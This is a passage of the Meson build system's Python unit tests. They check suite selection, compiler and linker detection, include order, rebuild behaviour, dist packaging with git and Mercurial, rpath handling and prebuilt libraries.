tests to fail.' % failure_count) except subprocess.CalledProcessError as e: self.assertEqual(e.returncode, failure_count) def test_suite_selection(self): testdir = os.path.join(self.unit_test_dir, '4 suite selection') self.init(testdir) self.build() self.assertFailedTestCount(4, self.mtest_command) self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success']) self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success']) self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail']) self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success']) self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail']) self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success']) self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail']) self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj']) self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail']) self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test']) self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail']) def test_build_by_default(self): testdir = os.path.join(self.common_test_dir, '130 build by default') self.init(testdir) self.build() genfile1 = os.path.join(self.builddir, 'generated1.dat') genfile2 = os.path.join(self.builddir, 'generated2.dat') exe1 = 
os.path.join(self.builddir, 'fooprog' + exe_suffix) exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix) self.assertPathExists(genfile1) self.assertPathExists(genfile2) self.assertPathDoesNotExist(exe1) self.assertPathDoesNotExist(exe2) self.build(target=('fooprog' + exe_suffix)) self.assertPathExists(exe1) self.build(target=('barprog' + exe_suffix)) self.assertPathExists(exe2) def test_internal_include_order(self): if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ): raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2') testdir = os.path.join(self.common_test_dir, '131 include order') self.init(testdir) execmd = fxecmd = None for cmd in self.get_compdb(): if 'someexe' in cmd['command']: execmd = cmd['command'] continue if 'somefxe' in cmd['command']: fxecmd = cmd['command'] continue if not execmd or not fxecmd: raise Exception('Could not find someexe and somfxe commands') # Check include order for 'someexe' incs = [a for a in split_args(execmd) if a.startswith("-I")] self.assertEqual(len(incs), 9) # Need to run the build so the private dir is created. self.build() pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p')) self.assertEqual(len(pdirs), 1) privdir = pdirs[0][len(self.builddir)+1:] self.assertPathEqual(incs[0], "-I" + privdir) # target build subdir self.assertPathEqual(incs[1], "-Isub4") # target source subdir self.assertPathBasenameEqual(incs[2], 'sub4') # include paths added via per-target c_args: ['-I'...] self.assertPathBasenameEqual(incs[3], 'sub3') # target include_directories: build dir self.assertPathEqual(incs[4], "-Isub2") # target include_directories: source dir self.assertPathBasenameEqual(incs[5], 'sub2') # target internal dependency include_directories: build dir self.assertPathEqual(incs[6], "-Isub1") # target internal dependency include_directories: source dir self.assertPathBasenameEqual(incs[7], 'sub1') # custom target include dir self.assertPathEqual(incs[8], '-Ictsub') # Check include order for 'somefxe' incs = [a for a in split_args(fxecmd) if a.startswith('-I')] self.assertEqual(len(incs), 9) # target private dir pdirs = glob(os.path.join(self.builddir, 'somefxe*.p')) self.assertEqual(len(pdirs), 1) privdir = pdirs[0][len(self.builddir)+1:] self.assertPathEqual(incs[0], '-I' + privdir) # target build dir self.assertPathEqual(incs[1], '-I.') # target source dir self.assertPathBasenameEqual(incs[2], os.path.basename(testdir)) # target internal dependency correct include_directories: build dir self.assertPathEqual(incs[3], "-Isub4") # target internal dependency correct include_directories: source dir self.assertPathBasenameEqual(incs[4], 'sub4') # target internal dependency dep include_directories: build dir self.assertPathEqual(incs[5], "-Isub1") # target internal dependency dep include_directories: source dir self.assertPathBasenameEqual(incs[6], 'sub1') # target internal dependency wrong include_directories: build dir self.assertPathEqual(incs[7], "-Isub2") # target internal dependency wrong include_directories: source dir self.assertPathBasenameEqual(incs[8], 'sub2') def test_compiler_detection(self): ''' Test that automatic compiler detection and setting from the environment both work just fine. This is needed because while running project tests and other unit tests, we always read CC/CXX/etc from the environment. 
''' gnu = mesonbuild.compilers.GnuCompiler clang = mesonbuild.compilers.ClangCompiler intel = mesonbuild.compilers.IntelGnuLikeCompiler msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler) clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler) ar = mesonbuild.linkers.ArLinker lib = mesonbuild.linkers.VisualStudioLinker langs = [('c', 'CC'), ('cpp', 'CXX')] if not is_windows() and platform.machine().lower() != 'e2k': langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')] testdir = os.path.join(self.unit_test_dir, '5 compiler detection') env = get_fake_env(testdir, self.builddir, self.prefix) for lang, evar in langs: # Detect with evar and do sanity checks on that if evar in os.environ: ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) self.assertTrue(ecc.version) elinker = env.detect_static_linker(ecc) # Pop it so we don't use it for the next detection evalue = os.environ.pop(evar) # Very rough/strict heuristics. Would never work for actual # compiler detection, but should be ok for the tests. ebase = os.path.basename(evalue) if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')): self.assertIsInstance(ecc, gnu) self.assertIsInstance(elinker, ar) elif 'clang-cl' in ebase: self.assertIsInstance(ecc, clangcl) self.assertIsInstance(elinker, lib) elif 'clang' in ebase: self.assertIsInstance(ecc, clang) self.assertIsInstance(elinker, ar) elif ebase.startswith('ic'): self.assertIsInstance(ecc, intel) self.assertIsInstance(elinker, ar) elif ebase.startswith('cl'): self.assertIsInstance(ecc, msvc) self.assertIsInstance(elinker, lib) else: raise AssertionError('Unknown compiler {!r}'.format(evalue)) # Check that we actually used the evalue correctly as the compiler self.assertEqual(ecc.get_exelist(), split_args(evalue)) # Do auto-detection of compiler based on platform, PATH, etc. 
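            # A compact restatement of the basename heuristic applied in the env
            # var branch above (hypothetical standalone helper, shown only for
            # illustration; the real detection logic lives in
            # mesonbuild.environment):
            #
            #     def classify_compiler(ebase):
            #         if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
            #             return 'gnu'       # gcc, g++, x86_64-linux-gnu-gcc, ...
            #         if 'clang-cl' in ebase:
            #             return 'clang-cl'  # MSVC-compatible clang driver
            #         if 'clang' in ebase:
            #             return 'clang'
            #         if ebase.startswith('ic'):
            #             return 'intel'     # icc / icpc
            #         if ebase.startswith('cl'):
            #             return 'msvc'
            #         raise ValueError('unknown compiler {!r}'.format(ebase))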
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) self.assertTrue(cc.version) linker = env.detect_static_linker(cc) # Check compiler type if isinstance(cc, gnu): self.assertIsInstance(linker, ar) if is_osx(): self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker) elif is_sunos(): self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)) else: self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin) if isinstance(cc, clangcl): self.assertIsInstance(linker, lib) self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker) if isinstance(cc, clang): self.assertIsInstance(linker, ar) if is_osx(): self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker) elif is_windows(): # This is clang, not clang-cl self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker) else: self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin) if isinstance(cc, intel): self.assertIsInstance(linker, ar) if is_osx(): self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker) elif is_windows(): self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker) else: self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker) if isinstance(cc, msvc): self.assertTrue(is_windows()) self.assertIsInstance(linker, lib) self.assertEqual(cc.id, 'msvc') self.assertTrue(hasattr(cc, 'is_64')) self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker) # If we're on Windows CI, we know what the compiler will be if 'arch' in os.environ: if os.environ['arch'] == 'x64': self.assertTrue(cc.is_64) else: self.assertFalse(cc.is_64) # Set evar ourselves to a wrapper script that just calls the same # exelist + some argument. This is meant to test that setting # something like `ccache gcc -pipe` or `distcc ccache gcc` works. 
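            # A minimal sketch of the quote/split round trip being exercised here,
            # using shlex as a stand-in for mesonlib's quote_arg()/split_args()
            # (assumption: they behave equivalently for these simple values):
            #
            #     import shlex
            #     exelist = ['python3', 'compiler wrapper.py', 'cc', '-DSOME_ARG']
            #     os.environ['CC'] = ' '.join(shlex.quote(a) for a in exelist)
            #     assert shlex.split(os.environ['CC']) == exelist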
wrapper = os.path.join(testdir, 'compiler wrapper.py') wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG'] wrappercc_s = '' for w in wrappercc: wrappercc_s += quote_arg(w) + ' ' os.environ[evar] = wrappercc_s wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) # Check static linker too wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args() wrapperlinker_s = '' for w in wrapperlinker: wrapperlinker_s += quote_arg(w) + ' ' os.environ['AR'] = wrapperlinker_s wlinker = env.detect_static_linker(wcc) # Pop it so we don't use it for the next detection evalue = os.environ.pop('AR') # Must be the same type since it's a wrapper around the same exelist self.assertIs(type(cc), type(wcc)) self.assertIs(type(linker), type(wlinker)) # Ensure that the exelist is correct self.assertEqual(wcc.get_exelist(), wrappercc) self.assertEqual(wlinker.get_exelist(), wrapperlinker) # Ensure that the version detection worked correctly self.assertEqual(cc.version, wcc.version) if hasattr(cc, 'is_64'): self.assertEqual(cc.is_64, wcc.is_64) def test_always_prefer_c_compiler_for_asm(self): testdir = os.path.join(self.common_test_dir, '134 c cpp and asm') # Skip if building with MSVC env = get_fake_env(testdir, self.builddir, self.prefix) if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc': raise unittest.SkipTest('MSVC can\'t compile assembly') self.init(testdir) commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}} for cmd in self.get_compdb(): # Get compiler split = split_args(cmd['command']) if split[0] == 'ccache': compiler = split[1] else: compiler = split[0] # Classify commands if 'Ic-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['c-asm']['asm'] = compiler elif cmd['file'].endswith('.c'): commands['c-asm']['c'] = compiler else: raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command'])) elif 'Icpp-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['cpp-asm']['asm'] = compiler elif cmd['file'].endswith('.cpp'): commands['cpp-asm']['cpp'] = compiler else: raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command'])) elif 'Ic-cpp-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['c-cpp-asm']['asm'] = compiler elif cmd['file'].endswith('.c'): commands['c-cpp-asm']['c'] = compiler elif cmd['file'].endswith('.cpp'): commands['c-cpp-asm']['cpp'] = compiler else: raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command'])) elif 'Icpp-c-asm' in cmd['command']: if cmd['file'].endswith('.S'): commands['cpp-c-asm']['asm'] = compiler elif cmd['file'].endswith('.c'): commands['cpp-c-asm']['c'] = compiler elif cmd['file'].endswith('.cpp'): commands['cpp-c-asm']['cpp'] = compiler else: raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command'])) else: raise AssertionError('Unknown command {!r} found'.format(cmd['command'])) # Check that .S files are always built with the C compiler self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c']) self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm']) self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c']) self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c']) self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c']) self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp']) self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp']) self.assertNotEqual(commands['cpp-c-asm']['c'], 
                            commands['cpp-c-asm']['cpp'])
        # Check that the c-asm target is always linked with the C linker
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        with open(build_ninja, 'r', encoding='utf-8') as f:
            contents = f.read()
            m = re.search('build c-asm.*: c_LINKER', contents)
        self.assertIsNotNone(m, msg=contents)

    def test_preprocessor_checks_CPPFLAGS(self):
        '''
        Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS
        but not LDFLAGS.
        '''
        testdir = os.path.join(self.common_test_dir, '133 get define')
        define = 'MESON_TEST_DEFINE_VALUE'
        # NOTE: this list can't have \n, ' or "
        # \n is never substituted by the GNU pre-processor via a -D define
        # ' and " confuse split_args() even when they are escaped
        # % and # confuse the MSVC preprocessor
        # !, ^, *, and < confuse lcc preprocessor
        value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
        for env_var in ['CPPFLAGS', 'CFLAGS']:
            env = {}
            env[env_var] = '-D{}="{}"'.format(define, value)
            env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
            self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)

    def test_custom_target_exe_data_deterministic(self):
        testdir = os.path.join(self.common_test_dir, '110 custom target capture')
        self.init(testdir)
        meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
        self.wipe()
        self.init(testdir)
        meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
        self.assertListEqual(meson_exe_dat1, meson_exe_dat2)

    def test_noop_changes_cause_no_rebuilds(self):
        '''
        Test that no-op changes to the build files such as mtime do not cause
        a rebuild of anything.
        '''
        testdir = os.path.join(self.common_test_dir, '6 linkshared')
        self.init(testdir)
        self.build()
        # Immediately rebuilding should not do anything
        self.assertBuildIsNoop()
        # Changing mtime of meson.build should not rebuild anything
        self.utime(os.path.join(testdir, 'meson.build'))
        self.assertReconfiguredBuildIsNoop()
        # Changing mtime of libfile.c should rebuild the library, but not relink the executable
        self.utime(os.path.join(testdir, 'libfile.c'))
        self.assertBuildRelinkedOnlyTarget('mylib')

    def test_source_changes_cause_rebuild(self):
        '''
        Test that changes to sources and headers cause rebuilds, but not
        changes to unused files (as determined by the dependency file) in the
        input files list.
        '''
        testdir = os.path.join(self.common_test_dir, '20 header in file list')
        self.init(testdir)
        self.build()
        # Immediately rebuilding should not do anything
        self.assertBuildIsNoop()
        # Changing mtime of header.h should rebuild everything
        self.utime(os.path.join(testdir, 'header.h'))
        self.assertBuildRelinkedOnlyTarget('prog')

    def test_custom_target_changes_cause_rebuild(self):
        '''
        Test that in a custom target, changes to the input files, the
        ExternalProgram, and any File objects on the command-line cause
        a rebuild.
        '''
        testdir = os.path.join(self.common_test_dir, '58 custom header generator')
        self.init(testdir)
        self.build()
        # Immediately rebuilding should not do anything
        self.assertBuildIsNoop()
        # Changing mtime of these should rebuild everything
        for f in ('input.def', 'makeheader.py', 'somefile.txt'):
            self.utime(os.path.join(testdir, f))
        self.assertBuildRelinkedOnlyTarget('prog')

    def test_source_generator_program_cause_rebuild(self):
        '''
        Test that changes to generator programs in the source tree cause
        a rebuild.
''' testdir = os.path.join(self.common_test_dir, '91 gen extra') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of generator should rebuild the executable self.utime(os.path.join(testdir, 'srcgen.py')) self.assertRebuiltTarget('basic') def test_static_library_lto(self): ''' Test that static libraries can be built with LTO and linked to executables. On Linux, this requires the use of gcc-ar. https://github.com/mesonbuild/meson/issues/1646 ''' testdir = os.path.join(self.common_test_dir, '5 linkstatic') env = get_fake_env(testdir, self.builddir, self.prefix) if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows(): raise unittest.SkipTest('LTO not (yet) supported by windows clang') self.init(testdir, extra_args='-Db_lto=true') self.build() self.run_tests() def test_dist_git(self): if not shutil.which('git'): raise unittest.SkipTest('Git not found') if self.backend is not Backend.ninja: raise unittest.SkipTest('Dist is only supported with Ninja') try: self.dist_impl(_git_init) except PermissionError: # When run under Windows CI, something (virus scanner?) # holds on to the git files so cleaning up the dir # fails sometimes. pass def has_working_hg(self): if not shutil.which('hg'): return False try: # This check should not be necessary, but # CI under macOS passes the above test even # though Mercurial is not installed. if subprocess.call(['hg', '--version'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) != 0: return False return True except FileNotFoundError: return False def test_dist_hg(self): if not self.has_working_hg(): raise unittest.SkipTest('Mercurial not found or broken.') if self.backend is not Backend.ninja: raise unittest.SkipTest('Dist is only supported with Ninja') def hg_init(project_dir): subprocess.check_call(['hg', 'init'], cwd=project_dir) with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f: print('[ui]', file=f) print('username=Author Person <teh_coderz@example.com>', file=f) subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir) subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir) try: self.dist_impl(hg_init, include_subprojects=False) except PermissionError: # When run under Windows CI, something (virus scanner?) # holds on to the hg files so cleaning up the dir # fails sometimes. pass def test_dist_git_script(self): if not shutil.which('git'): raise unittest.SkipTest('Git not found') if self.backend is not Backend.ninja: raise unittest.SkipTest('Dist is only supported with Ninja') try: with tempfile.TemporaryDirectory() as tmpdir: project_dir = os.path.join(tmpdir, 'a') shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'), project_dir) _git_init(project_dir) self.init(project_dir) self.build('dist') except PermissionError: # When run under Windows CI, something (virus scanner?) # holds on to the git files so cleaning up the dir # fails sometimes. pass def create_dummy_subproject(self, project_dir, name): path = os.path.join(project_dir, 'subprojects', name) os.makedirs(path) with open(os.path.join(path, 'meson.build'), 'w') as ofile: ofile.write("project('{}')".format(name)) return path def dist_impl(self, vcs_init, include_subprojects=True): # Create this on the fly because having rogue .git directories inside # the source tree leads to all kinds of trouble. 
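        # The generated project below looks roughly like this (all paths are
        # relative to the temporary project_dir):
        #
        #     meson.build                project('disttest', 'c', version : '1.4.3')
        #     distexe.c                  trivial "I am a distribution test." program
        #     subprojects/vcssub/        dummy subproject, committed to the VCS
        #     subprojects/tarballsub/    dummy subproject, tarball only
        #     subprojects/unusedsub/     dummy subproject that nothing references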
with tempfile.TemporaryDirectory() as project_dir: with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile: ofile.write(textwrap.dedent('''\ project('disttest', 'c', version : '1.4.3') e = executable('distexe', 'distexe.c') test('dist test', e) subproject('vcssub', required : false) subproject('tarballsub', required : false) ''')) with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile: ofile.write(textwrap.dedent('''\ #include<stdio.h> int main(int argc, char **argv) { printf("I am a distribution test.\\n"); return 0; } ''')) xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz') xz_checksumfile = xz_distfile + '.sha256sum' zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip') zip_checksumfile = zip_distfile + '.sha256sum' vcs_init(project_dir) if include_subprojects: vcs_init(self.create_dummy_subproject(project_dir, 'vcssub')) self.create_dummy_subproject(project_dir, 'tarballsub') self.create_dummy_subproject(project_dir, 'unusedsub') self.init(project_dir) self.build('dist') self.assertPathExists(xz_distfile) self.assertPathExists(xz_checksumfile) self.assertPathDoesNotExist(zip_distfile) self.assertPathDoesNotExist(zip_checksumfile) self._run(self.meson_command + ['dist', '--formats', 'zip'], workdir=self.builddir) self.assertPathExists(zip_distfile) self.assertPathExists(zip_checksumfile) if include_subprojects: z = zipfile.ZipFile(zip_distfile) self.assertEqual(sorted(['disttest-1.4.3/', 'disttest-1.4.3/meson.build', 'disttest-1.4.3/distexe.c']), sorted(z.namelist())) self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'], workdir=self.builddir) z = zipfile.ZipFile(zip_distfile) self.assertEqual(sorted(['disttest-1.4.3/', 'disttest-1.4.3/subprojects/', 'disttest-1.4.3/meson.build', 'disttest-1.4.3/distexe.c', 'disttest-1.4.3/subprojects/tarballsub/', 'disttest-1.4.3/subprojects/vcssub/', 'disttest-1.4.3/subprojects/tarballsub/meson.build', 'disttest-1.4.3/subprojects/vcssub/meson.build']), sorted(z.namelist())) def test_rpath_uses_ORIGIN(self): ''' Test that built targets use $ORIGIN in rpath, which ensures that they are relocatable and ensures that builds are reproducible since the build directory won't get embedded into the built binaries. ''' if is_windows() or is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') testdir = os.path.join(self.common_test_dir, '40 library chain') self.init(testdir) self.build() for each in ('prog', 'subdir/liblib1.so', ): rpath = get_rpath(os.path.join(self.builddir, each)) self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each)) if is_dragonflybsd(): # DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath, # so ignore that. self.assertTrue(rpath.startswith('/usr/lib/gcc')) rpaths = rpath.split(':')[1:] else: rpaths = rpath.split(':') for path in rpaths: self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path)) # These two don't link to anything else, so they do not need an rpath entry. 
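        # For reference, the rpath entries asserted on above can also be
        # inspected by hand, assuming binutils' readelf is available
        # (illustrative output only; the exact tag and value depend on the
        # platform and linker):
        #
        #     $ readelf -d builddir/prog | grep -E 'R(UN)?PATH'
        #      0x000000000000001d (RUNPATH)  Library runpath: [$ORIGIN/subdir]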
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'): rpath = get_rpath(os.path.join(self.builddir, each)) if is_dragonflybsd(): # The rpath should be equal to /usr/lib/gccVERSION self.assertTrue(rpath.startswith('/usr/lib/gcc')) self.assertEqual(len(rpath.split(':')), 1) else: self.assertTrue(rpath is None) def test_dash_d_dedup(self): testdir = os.path.join(self.unit_test_dir, '9 d dedup') self.init(testdir) cmd = self.get_compdb()[0]['command'] self.assertTrue('-D FOO -D BAR' in cmd or '"-D" "FOO" "-D" "BAR"' in cmd or '/D FOO /D BAR' in cmd or '"/D" "FOO" "/D" "BAR"' in cmd) def test_all_forbidden_targets_tested(self): ''' Test that all forbidden targets are tested in the '151 reserved targets' test. Needs to be a unit test because it accesses Meson internals. ''' testdir = os.path.join(self.common_test_dir, '151 reserved targets') targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES # We don't actually define a target with this name targets.pop('build.ninja') # Remove this to avoid multiple entries with the same name # but different case. targets.pop('PHONY') for i in targets: self.assertPathExists(os.path.join(testdir, i)) def detect_prebuild_env(self): env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) stlinker = env.detect_static_linker(cc) if mesonbuild.mesonlib.is_windows(): object_suffix = 'obj' shared_suffix = 'dll' elif mesonbuild.mesonlib.is_cygwin(): object_suffix = 'o' shared_suffix = 'dll' elif mesonbuild.mesonlib.is_osx(): object_suffix = 'o' shared_suffix = 'dylib' else: object_suffix = 'o' shared_suffix = 'so' return (cc, stlinker, object_suffix, shared_suffix) def pbcompile(self, compiler, source, objectfile, extra_args=None): cmd = compiler.get_exelist() extra_args = extra_args or [] if compiler.get_argument_syntax() == 'msvc': cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args else: cmd += ['-c', source, '-o', objectfile] + extra_args subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) def test_prebuilt_object(self): (compiler, _, object_suffix, _) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '15 prebuilt object') source = os.path.join(tdir, 'source.c') objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix) self.pbcompile(compiler, source, objectfile) try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(objectfile) def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None): if extra_args is None: extra_args = [] if compiler.get_argument_syntax() == 'msvc': link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile] else: link_cmd = ['ar', 'csr', outfile, objectfile] link_cmd = linker.get_exelist() link_cmd += linker.get_always_args() link_cmd += linker.get_std_link_args() link_cmd += linker.get_output_args(outfile) link_cmd += [objectfile] self.pbcompile(compiler, source, objectfile, extra_args=extra_args) try: subprocess.check_call(link_cmd) finally: os.unlink(objectfile) def test_prebuilt_static_lib(self): (cc, stlinker, object_suffix, _) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '16 prebuilt static') source = os.path.join(tdir, 'libdir/best.c') objectfile = os.path.join(tdir, 'libdir/best.' 
+ object_suffix) stlibfile = os.path.join(tdir, 'libdir/libbest.a') self.build_static_lib(cc, stlinker, source, objectfile, stlibfile) # Run the test try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(stlibfile) def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None): if extra_args is None: extra_args = [] if compiler.get_argument_syntax() == 'msvc': link_cmd = compiler.get_linker_exelist() + [ '/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile, '/OUT:' + outfile, objectfile] else: if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()): extra_args += ['-fPIC'] link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile] if not mesonbuild.mesonlib.is_osx(): link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)] self.pbcompile(compiler, source, objectfile, extra_args=extra_args) try: subprocess.check_call(link_cmd) finally: os.unlink(objectfile) def test_prebuilt_shared_lib(self): (cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared') source = os.path.join(tdir, 'alexandria.c') objectfile = os.path.join(tdir, 'alexandria.' + object_suffix) impfile = os.path.join(tdir, 'alexandria.lib') if cc.get_argument_syntax() == 'msvc': shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix) elif is_cygwin(): shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix) else: shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix) self.build_shared_lib(cc, source, objectfile, shlibfile, impfile) # Run the test try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(shlibfile) if mesonbuild.mesonlib.is_windows(): # Clean up all the garbage MSVC writes in the # source tree. for fname in glob(os.path.join(tdir, 'alexandria.*')): if os.path.splitext(fname)[1] not in ['.c', '.h']: os.unlink(fname) @skipIfNoPkgconfig def test_pkgconfig_static(self): ''' Test that the we prefer static libraries when `static: true` is passed to dependency() with pkg-config. Can't be an ordinary test because we need to build libs and try to find them from meson.build Also test that it's not a hard error to have unsatisfiable library deps since system libraries -lm will never be found statically. https://github.com/mesonbuild/meson/issues/2785 ''' (cc, stlinker, objext, shext) = self.detect_prebuild_env() testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static') source = os.path.join(testdir, 'foo.c') objectfile = os.path.join(testdir, 'foo.' + objext) stlibfile = os.path.join(testdir, 'libfoo.a') impfile = os.path.join(testdir, 'foo.lib') if cc.get_argument_syntax() == 'msvc': shlibfile = os.path.join(testdir, 'foo.' + shext) elif is_cygwin(): shlibfile = os.path.join(testdir, 'cygfoo.' + shext) else: shlibfile = os.path.join(testdir, 'libfoo.' + shext) # Build libs self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC']) self.build_shared_lib(cc, source, objectfile, shlibfile, impfile) # Run test try: self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir}) self.build() self.run_tests() finally: os.unlink(stlibfile) os.unlink(shlibfile) if mesonbuild.mesonlib.is_windows(): # Clean up all the 